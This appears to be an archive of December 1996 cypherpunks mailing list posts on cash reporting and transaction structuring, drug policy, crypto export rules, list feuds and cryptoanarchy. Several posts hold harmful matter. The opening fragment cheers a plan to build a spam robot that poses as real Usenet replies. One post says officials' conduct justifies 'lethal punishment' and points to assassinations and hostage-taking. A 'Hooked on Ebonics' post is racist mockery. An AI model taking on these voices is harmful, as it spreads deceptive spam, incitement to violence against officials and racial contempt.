> traffic, pretend to follow up on postings from actual people, say
> something on-topic, and post your message, but vary it randomly, so
> it's almost never the same.

Dr., this is a stroke of genius!!  I think we should start on this 
immediately!  No one would even know it was spam, or a spamming 
robot!!!

> 
> I think we can make a pretty good program. "Cypher punks" don't
> write code, but we do.

Fuck them if they can't take a joke!!!  Let's write some code!  I am 
cc:ing this to a couple others who helped me write the "link 
following" web-robot I am currently using!  Let's get on this usenet 
thing NOW!!!!

Ross

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 24 Dec 1996 11:32:37 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Legality of requiring credit cards?
Message-ID: <01BBF1A7.45E1F7D0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> > I bought a new PC a few months ago with just shy of $7K worth of
> > $100 bills.  No one even blinked.
> > 
> > regards,
> > -Blake (cash is good)
> > 
> Remember that if you go over 10K, the recipient is supposed to file a 
> form 8300 with the IRS ....

I was vaguely aware of this regulation (it's been discussed here in the
past) but actually I'm from north of the border.  Does anyone know if
there is are similar regulations in Canada?

regards,
-Blake





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Tue, 24 Dec 1996 11:49:50 -0800 (PST)
To: "'Cypherpunks'" <cypherpunks@toad.com>
Subject: Democracy, yeah right.
Message-ID: <01BBF1A9.AF9D0190@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


The War on Some Drugs stikes again

Challenging it it court would be too much work and not
likely to succeed so why not just throw some doctors
in jail and scare the rest off.

>From AP via MSNBC:

       NEW YORK - The federal government has acknowledged 
  plans to prosecute doctors who prescribe marijuana and other 
  illegal drugs to seriously ill people under new laws approved by 
  voters in California and Arizona, The New York Times reported 
  Monday.
        Authorities plan to prosecute some doctors who help 
  supply such drugs to patients and strip their prescription 
  licenses, officials told the paper. Voters in Arizona and 
  California last month approved measures that relax restrictions 
  on the medical use of some illegal drugs. 
        The plan to move against doctors follows the Justice 
  Department's decision not to challenge the new state laws 
  in court. Federal officials also plan to launch a public-relations 
  campaign to remind Americans of the dangers of illegal drugs.

So remind me again, what exactly is the moral difference 
between Prozac and THC?

regards,
-Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 12:30:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: MCIP?
In-Reply-To: <199612241646.LAA15417@homeport.org>
Message-ID: <TDJgZD75w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:

> I have on an old account being closed, most of the traffic from the
> Mac Crypto Interface Project mailing list.
>
> Does anyone want them?

If it's worth it, put them up for FTP somewhere.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 12:32:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [Fwd: usenet censorship]
In-Reply-To: <32C0262C.1BDE@sk.sympatico.ca>
Message-ID: <5HJgZD76w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


> Does anyone know of a server that allows uncensored news groups, mine
> censors all alt. groups.

Check out alt.net.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 24 Dec 1996 12:29:42 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <32C036F3.24D6@gte.net>
Message-ID: <Pine.BSF.3.91.961224152114.2335J-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dale Thorn wrote:

> Brian Davis wrote:
> > On Tue, 24 Dec 1996, Blake Coverett wrote:
> > > jonathon wrote:
> > > >     Go shopping with a wad of $100.00 bills.   Most stores don't
> > > >     accept them, regardless of the amount of purchase, without
> > > >     additional ID.
> 
> > > I bought a new PC a few months ago with just shy of $7K worth of
> > > $100 bills.  No one even blinked.
> 
> > Remember that if you go over 10K, the recipient is supposed to file a
> > form 8300 with the IRS ....
> 
> Make sure that, unless you don't mind the FBI putting an extra monitor
> on you, you don't *ever* transact $10k or more at one time, or on one
> purchase in smaller increments over a relatively short period of time.

Be especially carefully of structuring a $10,000+ transaction into 
smaller transactions in an attempt to circumvent the reporting 
requirements.  Doing so ("structuring a transaction") is a felony.

I was involved in reviewing a matter for possible prosecution in my 
former life.  Guy wins big football pool (season long) -- total of 
$27,000.  He calls an *leaves a message* that he wants 3 $9,000 checks.  
He gets them, goes to branch 1 of bank x and cashes one.  Then to branch 2 
and cashes another.  Then back to branch 1 for the third.

The bank, as required, filed a Report of Suspcious Transaction.  
Fortunately for him, the IRS-CID agents jumped the gun and alerted him to 
the investigation (by interviewing him) before he filed his taxes for 
that year.  He then knew enough to report the income and pay the taxes.

We settled the matter by having the money forfeited and having a civil 
monetary penalty assessment against him under the Bank Secrecy Act (the 
first such penalty against an individual ever).  He got credit on the 
civil assessment for the money forfeited, so all he lost was his $27,000 
in winnings.

Had he been better at it, he never would've been caught, IMNSHO.

EBD  


> I know this because one of our customers in Encino was tagged this way
> in 1983.  What was really hilarious was that they brought the equipment
> in for us to have a look at, since we were experts on HP proprietary
> gear and they weren't.  (Or we were a lot cheaper than HP corp.)
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Dec 1996 12:58:46 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Ebonics
In-Reply-To: <y8agZD65w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961224155938.20557A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Your English isn't so good, Ray... I am not a "cypher punk", so you
> shouldn't speak of "the rest of" "cypher punks".

Then why do you continue posting here?  If you aren't a cypherpunk, go away.
 
> If John's punitive action in response to my speech makes no difference to you,
> then why did you ask him to do it, and why did you commend him afterwards?

I'm only disappointed that you are still here, that's all.


=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobbi <rkluge@nunic.nu.edu>
Date: Tue, 24 Dec 1996 16:00:21 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: domestic laws/policies
In-Reply-To: <v03007811aee5e4fb78dd@[206.217.121.78]>
Message-ID: <Pine.GSO.3.95.961224153949.7677B-100000@nunic.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain




My understanding goes with along with your statements.
I got asked a question the other day and that person emphatically stated
you "must" register the algorithm with the NSA(for domestic use).
I was not aware of this even for exporting software that has cryptographic
capability. If you export software do you have to "register" the
algorithm? Or maybe I should ask - are there any situations where you do
have to register the algorithm? For export I'm only aware that the
strength of the algoritm has to be equal to or less than 40-bit DES.

I think he was getting confused with GAK.




bobbi kluge                            voice: 619.945.6248                                
rkluge@nunic.nu.edu                    fax: 619.945.6397
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj  "Once more 
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1   into the
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)     breach.." WS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Tue, 24 Dec 1996 13:12:19 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: Both John Gilmore and Ray Arachelian are liars
In-Reply-To: <32C043C2.20E5@gte.net>
Message-ID: <Pine.SUN.3.91.961224161235.20557B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Dale Thorn wrote:

> This must be what is called a nonsequitur.  He can *always* be here,
> one way or another.  That was never the point.

It is my point.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 24 Dec 1996 13:10:34 -0800 (PST)
To: "'Cypherpunks'" <blake@bcdev.com>
Subject: Re: Democracy, yeah right.
In-Reply-To: <01BBF1A9.AF9D0190@bcdev.com>
Message-ID: <Pine.LNX.3.95.961224155442.320A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 24 Dec 1996, Blake Coverett wrote:

> The War on Some Drugs stikes again
> 
> Challenging it it court would be too much work and not
> likely to succeed so why not just throw some doctors
> in jail and scare the rest off.
> 
> >From AP via MSNBC:
> 
>        NEW YORK - The federal government has acknowledged 
>   plans to prosecute doctors who prescribe marijuana and other 
>   illegal drugs to seriously ill people under new laws approved by 
>   voters in California and Arizona, The New York Times reported 
>   Monday.
>         Authorities plan to prosecute some doctors who help 
>   supply such drugs to patients and strip their prescription 
>   licenses, officials told the paper. Voters in Arizona and 
>   California last month approved measures that relax restrictions 
>   on the medical use of some illegal drugs. 
>         The plan to move against doctors follows the Justice 
>   Department's decision not to challenge the new state laws 
>   in court. Federal officials also plan to launch a public-relations 
>   campaign to remind Americans of the dangers of illegal drugs.
> 
> So remind me again, what exactly is the moral difference 
> between Prozac and THC?

Marijuana isn't the only drug that doctors are reluctant to prescribe for fear
of losing their medical licenses.  There is a list of legal drugs that most
doctors would never prescribe.  The DEA wasn't able to put a ban on those
drugs, so they just send a bunch of armed thugs to harass any doctor who
prescribes them.  As for the difference between Prozac and THC, I really don't
know.  Marijuana is a Schedule I drug, meaning that it is dangerous and has
no medical value.  Methamphetamine is a Schedule II drug, meaning that it has
medical value and can be prescribed.  It doesn't make any sense to me either.

As for the public-relations campaign, the government is just going to drag a
bunch of old, flawed medical experiments that supposedly prove that marijauna
is dangerous.  Most of these experiments were conducted by Gabriel Nahas.
Meanwhile, the experiment done at the University of Virginia that shows that
marijuana has tumor-preventing properties will never be mentioned.  The FDA
immediately pulled the funding for this study when they discovered the results
and has banned all further medical experiments involving marijuana.  Nor will
any mention be made of The LaGuardia Report.

Crypto relevance is very minimal, other than the fact that pseudonymous
signatures would solve the problem of doctors being persecuted.  This does
show how the government might go about banning crypto.  Launch a "public
relations campaign" and start seizing FTP servers that make crypto available a
la Sundevil.  Finding loopholes to harass people without having togo through
due process is a very good tactic for undermining democracy.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.
0xf9b22ba5 now revoked

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsBHRSzIPc7jvyFpAQEL6AgAyLH8nPo15oJji4SLgI0jDB/4bHcw23nz
Hfy8tOCdP2eg7YPKdyVPMM/+Xo0UbBYZLPtTcw8vKs0RNNNKEotGi82MrR9SeSyw
3U2NFe/Ghz8Cdg+Wr1xC5kw7tgrjoK237piHeAMQCH54McrAQuWFX0N29Iu94DXQ
tDdvnquEMV0wyUpbnfQPFgue5PqsJeXSyvvoyUTbEb8Az7UBI+LgkWOG6tq/zjDz
oWcDrCAXLZgqkG/Bj8lwaZb/Zp/IRvqESAt/ssich39+9c6MqS7wIB9JfaQrMu77
TM0v5uc+294h/pqqCy8mwVkptP7Ms6CaGweP5kdUUgcvlAIhVbXMiA==
=MchN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 24 Dec 1996 13:24:01 -0800 (PST)
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: clipper plans 4 sale (was Re: Earl Edwin Pitts, $224,000)
In-Reply-To: <199612242026.MAA18998@netcom18.netcom.com>
Message-ID: <199612242119.QAA16490@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:

| CYPHERPUNKS-- this would be another big front page NYT article and
| *severe* blow to the spook establishment if someone PUBLISHED this
| algorithm in cyberspace.... just noting the obvious and not
| encouraging anything ILLEGAL here, heh heh, <wink>

	I disagree.  I think publishing Skipjack would be
counterproductive.

	Right now, we're shooting to make the ITARs irrelevant by
saying things like 'IDEA is Swiss, and when we can't export it from
the US.  What does that do to competitiveness?'  We can't make that
claim about Skipjack.  Skipjack is an NSA designed cipher which the
agency probably expects will be publicised.

	But would they ever admit to it?  Heck no.  When its
published, expect screams of bloody murder by the four horsemen.

	Many people will believe it.  Its easy to construct the case
that the ITARs, as they apply to things in the public domain, thing
implemented outside the US, things designed outside the US, are just
silly.  Its much harder to make that argument about Skipjack,
especially as you can't legally export the chips.

Adam

PS: The current (year end double issue) of the Economist is quite an
enjoyable read.  Crypto relevance?  The decipherment of Mayan
hieroglyphics, some on commerce on the net.  But mostly I just found
it a very enjoyable read.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 13:50:21 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Unsubscribing Dr. Vulius
In-Reply-To: <32C00B59.7FD1@gte.net>
Message-ID: <15mgZD80w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:

> this is a crypto list, and there are all those NSA spooks watching
> everything we do....

Watching and laughing, no doubt.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Tue, 24 Dec 1996 16:37:23 -0800 (PST)
To: bobbi <rkluge@nunic.nu.edu>
Subject: Re: domestic laws/policies
In-Reply-To: <v03007811aee5e4fb78dd@[206.217.121.78]>
Message-ID: <v03007816aee628013a9c@[207.93.129.120]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:02 PM -0800 12/24/96, bobbi wrote:
>I got asked a question the other day and that person emphatically stated
>you "must" register the algorithm with the NSA(for domestic use).
>I was not aware of this even for exporting software that has cryptographic
>capability. If you export software do you have to "register" the
>algorithm? Or maybe I should ask - are there any situations where you do
>have to register the algorithm? For export I'm only aware that the
>strength of the algoritm has to be equal to or less than 40-bit DES.

You have to describe the algorithm as part of getting an export license, or
commodity jurisdiction.  Since this description must be in sufficient
detail so a reader can implement the algorithm, this description might
properly be described as "registration".


-------------------------------------------------------------------------
Bill Frantz       | Client in California, POP3 | Periwinkle -- Consulting
(408)356-8506     | in Pittsburgh, Packets in  | 16345 Englewood Ave.
frantz@netcom.com | Pakistan. - me             | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 24 Dec 1996 14:06:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Ebonics
In-Reply-To: <199612241847.KAA24854@slack.lne.com>
Message-ID: <1LNgZD82w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:

> The determined poster could even grab a subscriber list from the lists's
> mailserver, and send his message to each member individually.

I can't quite do that either because majordomo@toad.com has been instructed
to silently ignore *all* requests from me, including "who".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bobbi <rkluge@nunic.nu.edu>
Date: Tue, 24 Dec 1996 16:44:30 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: domestic laws/policies
In-Reply-To: <v03007816aee628013a9c@[207.93.129.120]>
Message-ID: <Pine.GSO.3.95.961224164555.8505A-100000@nunic.nu.edu>
MIME-Version: 1.0
Content-Type: text/plain





Thank you. That is pretty clear.


bobbi kluge             voice: 619.945.6248                                     
rkluge@nunic.nu.edu     fax: 619.945.6397








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Dec 1996 18:06:16 -0800 (PST)
To: Brian Davis <dthorn@gte.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612250205.SAA17605@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:29 PM 12/24/96 -0500, Brian Davis wrote:
>On Tue, 24 Dec 1996, Dale Thorn wrote:

>
>Be especially carefully of structuring a $10,000+ transaction into 
>smaller transactions in an attempt to circumvent the reporting 
>requirements.  Doing so ("structuring a transaction") is a felony.
>
>I was involved in reviewing a matter for possible prosecution in my 
>former life.  Guy wins big football pool (season long) -- total of 
>$27,000.  He calls an *leaves a message* that he wants 3 $9,000 checks.  
>He gets them, goes to branch 1 of bank x and cashes one.  Then to branch 2 
>and cashes another.  Then back to branch 1 for the third.
>
>The bank, as required, filed a Report of Suspcious Transaction.  
>Fortunately for him, the IRS-CID agents jumped the gun and alerted him to 
>the investigation (by interviewing him) before he filed his taxes for 
>that year.  He then knew enough to report the income and pay the taxes.
>
>We settled the matter by having the money forfeited and having a civil 
>monetary penalty assessment against him under the Bank Secrecy Act (the 
>first such penalty against an individual ever).  He got credit on the 
>civil assessment for the money forfeited, so all he lost was his $27,000 
>in winnings.
>
>Had he been better at it, he never would've been caught, IMNSHO.


Actually, this kind of stunt fully justifies whatever level of lethal 
punishment  that the public will one day direct at these thugs.  Look at 
what you just said, paraphrased by me:

"Man wins $27,000.  He will eventually be required to report and pay taxes 
on the amount, but not quite yet.  Stupid I/R/S people alert him BEFORE he 
files his taxes.  He reports the payment, as is ostensibly legally required. 
 He paid the taxes owed.  Period."

THEN you said, "we settled the matter."   Huh?  What, exactly, was there to 
"settle"?  Remember, you just said that the stupid I/R/S agents ALERTED him, 
right?  Well, if they do stupid things they ought to be punished for them, 
right?!?  One of the consequences of showing your hand early is that any 
potential opponent can adjust his behavior to AVOID getting caught doing 
something wrong.  Since this man's obligations were in the future, he was 
alerted to fulfill them.

(this is quite analogous to cops driving around in marked cars.  Presumably, 
they will occasionally be seen by a person planning a crime, who may be 
deterred from his intent temporarily or permanently.)

Don't try to claim that the act of receiving the money in portions evidenced 
intent to commit a crime, because reporting and paying the taxes made that 
possibility moot.  At best, you might claim that had he COULD HAVE carried 
it through to illegality, analogous to the possibility that if a person 
picks up an object in a store, he MIGHT head for the exit without paying, or 
go to the cash register to pay.  Store detectives, wisely, know that they 
must wait for a shoplifter to leave the store BEFORE closing in.

I say again:  It is  PRECISELY this kind of outrageous behavior that results 
in revolutions, assassinations, and other incidents.  The hostage-taking 
currently going on in Peru has captured Peruvian government officials who 
heretofore, felt safe abusing THEIR citizenry the same way you once felt 
safe abusing yours. Tell me, would you have felt abused if during your 
previous employment you'd been taken hostage similarly?


 

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Omegaman <omega@bigeasy.com>
Date: Tue, 24 Dec 1996 15:39:18 -0800 (PST)
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Untraceable Payments, Extortion, and Other Bad Things
In-Reply-To: <199612242038.MAA20079@netcom18.netcom.com>
Message-ID: <Pine.LNX.3.95.961224182704.3135A-100000@jolietjake.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Dec 1996, Vladimir Z. Nuri wrote:

> >I thought the message was a pretty clear statement of opinion.  ie. 
> >the deconstruction of democracy is a good thing and cryptoanarchy 
> >will a enable a more just society.  (Some would argue more brutal as 
> >well, but I think that the level of brutatlity in society would 
> >change little from it's current levels.)
> 
> wow, what a ringing endorsement for cryptoanarchy, and quite Mayesque
> in its style.

You're not very good with context, I see.  The above statement neither
endorses nor condemns the notion of cryptoanarchy.  

You claim that you want to debate Tim on the issue but that he won't put the
issues on the table.  It's all right there for you to attack or support.  

Here:
THESIS:The deconstruction of democracy enabled by the inevitable genesis of
cryptoanarchy will result in a more just (fair?) society.  

Go for it.   Please start a relevant and interesting debate.  But quit
whining that Tim May won't challenge your brilliant mind.  Pick a point and
dissect whether it's accurate or flawed.

> CRYPTOANARCHY!!! GO FOR IT!! IT PROBABLY WON'T BE ANY MORE
> BRUTAL THAN THE WORLD IS ALREADY!!!

Brutality amongst human beings has little to do with what type of
government (or lack thereof) we have established.  Nor is brutality
inevitable amongst human beings; governments have little or no affect on how
individuals think and behave.

> the cryptoanarchy thesis IS crap. everyone with a few brain cells to rub 
> together is capable of seeing through this machiavellian dystopian trash
> masquerading as a rational political philosophy.
>
> anyone heard of "memes"? cryptoanarchy is a virus of weak minds without
> any defense mechanisms. the cpunk list is the principal vector..

Great.  But you said you wanted to debate the fundamental points raised by
May. 

> Mr. May's complex thesis, my profuse apologies if I misunderstood any
> of the parts about extortion, kidnapping, tax evasion, anonymous
> assassinations, etc.

O.K.  The point in the original message was that these things are inevitable
if only one anonymous payment system is established.  

1) Do you agree that these things are an inevitable consequence of anonymous
untraceable payment systems?

2) Do you agree then that all it would take is just one?  Or could one alone
be stopped or controlled?  how?

3) How can these bad things be prevented with an anonymous untraceable 
payment system?

Pick any or all points and make your case.


_______________________________________________________________
 Omegaman <mailto:omega@bigeasy.com> 
  PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2
                        59 0A 01 E3 AF 81 94 63 
 Send e-mail with "get key" in the "Subject:" 
 field to get a copy of my public key
_______________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Wed, 25 Dec 1996 17:52:10 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: Legality of requiring credit cards?
In-Reply-To: <199612250205.SAA17605@mail.pacifier.com>
Message-ID: <32C0995F.6569@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> At 03:29 PM 12/24/96 -0500, Brian Davis wrote:
> >On Tue, 24 Dec 1996, Dale Thorn wrote:
> >Be especially carefully of structuring a $10,000+ transaction into
> >smaller transactions in an attempt to circumvent the reporting
> >requirements.  Doing so ("structuring a transaction") is a felony.

> Actually, this kind of stunt fully justifies whatever level of lethal
> punishment  that the public will one day direct at these thugs.  Look at
> what you just said, paraphrased by me:

[snip]

I was surprised at this "settlement" thing.  I'd sure like to get more
detail on that.  A pointer would be *most* appreciated.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@cnw.com>
Date: Tue, 24 Dec 1996 19:03:52 -0800 (PST)
To: "cypherpunks@toad.com>
Subject: RE: Untraceable Payments, Extortion, and Other Bad Things
Message-ID: <01BBF1CD.95B0C400@king1-11.cnw.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	Vlad the Conqueror

anyone heard of "memes"? cryptoanarchy is a virus of weak minds without any 
defense mechanisms. the cpunk list is the principal vector..
.....................................................


So, Nuri-logical, are you one of those NSA tentacles on the list, 
discouraging people from following certain ideas - like Tim's, for example? 
  <g>

Are you feeling a bit in-Timmy-dated by the possibility of a crypto reign 
of terror; do you feel a bit like you're part of that stuff floating at the 
top about to be skimmed off?

What do you think would be a good antidote for this cryptoanarchy virus? 
 How do you imagine that it might be introduced into the Brave New World of 
anarchocapitalism; how could it effectively counter the growth of 
libertarian ideals, which you despise?

Tim sort of evaded my question by asserting that the methods of which he 
spoke were implicit in his writings.  I hope you don't claim the same, but 
are more blatant and explicit about your ideas to the contrary (though 
typically you are blatant, although not necessarily explicit).

    ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 24 Dec 1996 19:29:21 -0800 (PST)
To: "Brian A. LaMacchia" <bdavis@thepoint.net>
Subject: Re: Legality of requiring credit cards?
Message-ID: <199612250329.TAA21067@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:39 PM 12/24/96 -0500, Brian A. LaMacchia wrote:
>At 05:54 PM 12/24/96 -0800, jim bell wrote:
>>"Man wins $27,000.  He will eventually be required to report and pay taxes 
>>on the amount, but not quite yet.  Stupid I/R/S people alert him BEFORE he 
>>files his taxes.  He reports the payment, as is ostensibly legally required. 
>> He paid the taxes owed.  Period."
>>
>>THEN you said, "we settled the matter."   Huh?  What, exactly, was there to 
>>"settle"?  
>
>Why, of course, the fact that the guy attempted to structure the
>transaction to evade the reporting requirements in the first place.  31
>U.S.C. 5324(a). 

Who says?  He eventually reported it within the legally-defined time.  The 
evidence of intent to COMPLY with the law is far stronger than the evidence 
of the opposite.  


>Structuring (or attempting to structure) a financial
>transaction to evade the reporting requirements is a violation of this
>subsection, and 31 U.S.C. 5322(a) says that a willful violation is a
>five-year felony.

Again, he clearly DID NOT "evade the reporting requirement."  Brian Davis 
admitted this. (Whether he ever intended to do this is sheer speculation on 
the part of anyone else.  We'll never know; as Davis pointed out, the IRS 
screwed up.)   Even if the standard of evidence was as low as "preponderance 
of evidence" (which it, of course, is not in a criminal case) he SHOULD have 
won.  By waiting until the return was filed and the tax was paid, the IRS 
was allowing him to resolve whatever ambiguity remained.

Actually, if there were any justice, he should have been able to sue the 
bank for reporting him and NOT INFORMING HIM of that fact.  (I presume the 
law requires the bank to report suspicious transactions.  I also presume 
that the law _doesn't_ prohibit the bank from telling the customer that it 
will have to report that transaction.)  The bank, presumably being experts 
in the matter, recognizes that lay individuals can't be expected to be experts 
in specialized areas, and should be considered obligated to warn customers 
away from suspicious-looking transactions.  I'm sure the REAL LAWYERS (tm) 
on this list will be able to cite examples of where experts of all kinds 
were sued by non-experts for failing to warn them of unexpected dangers that 
could have been averted had the appropriate advice been given promptly.











Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 24 Dec 1996 19:16:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: Hooked on Ebonics
Message-ID: <v02140b00aee634927860@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Now that the new Afrocentric Ebonic language is officially recognized, we
have a lot of work to do. Having textbooks published in English and Hip Hop
is going to be daunting. New educational tapes, "Hooked on Ebonics" will
have to be produced.  Answers to test questions will have to be analyzed
and converted, and an entire new dictionary will need to be established.
You know what I'm sayin'?

In some ways life will get much simpler.  No longer will we be burdened
with the cumbersome task of searching our minds for the proper adjective,
pronoun, or participle.  An expletive invoking another's mother will be the
only adjective, pronoun, or metaphor in the new Ebonics dictionary.
Bernard Shaw and Alan Keyes could get rid of that bothersome eloquence and
perfect diction and rap it back Black, lay it on me bro.

I'm curious about the "N word."  Will that be allowed?  I do hear it a lot
in movies centered around life in the ethnic neighborhoods of L.A. or
Oakland.  The reason I ask is because where I work you'll be severely fired
if you toss out the "N word."  We'll need to have clarification. It would
be kind of strange to have an official language that only one ethnic group
is allowed to use.

Maybe if we could get Texaconics declared an official language of the
corporate elite we could give those guys at Texaco their jobs back.  Ross
Perot could say, "You people" with impunity.  As a matter of fact we can
have an official language for however you want to talk.  Bigotonics,
Stupidonics, Stoneronics, Skatersonics, Preppyonics and last but not least,
I can't get a decent job anywhere in the world because I was educated in
the Oakland School Districtonics.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SpyKing <spyking@thecodex.com>
Date: Tue, 24 Dec 1996 17:46:45 -0800 (PST)
To: (Recipient list suppressed)
Subject: The Surveillance List...
Message-ID: <9612250027.AA23205@yod.mne.com>
MIME-Version: 1.0
Content-Type: text/plain


Interested in joining a FREE moderated list to discuss surveillance and
counter-surveillance technology? This list is for professionals and those
interested in the business... Join the "Surveillance List" today... We'll 
cover such topics as:
 
Audio surveillance technology... 
Video surveillance technology... 
Methods of eavesdropping... 
TSCM... 
Electronic countermeasures... 
Trade Shows...
Equipment... What works... What doesn't...
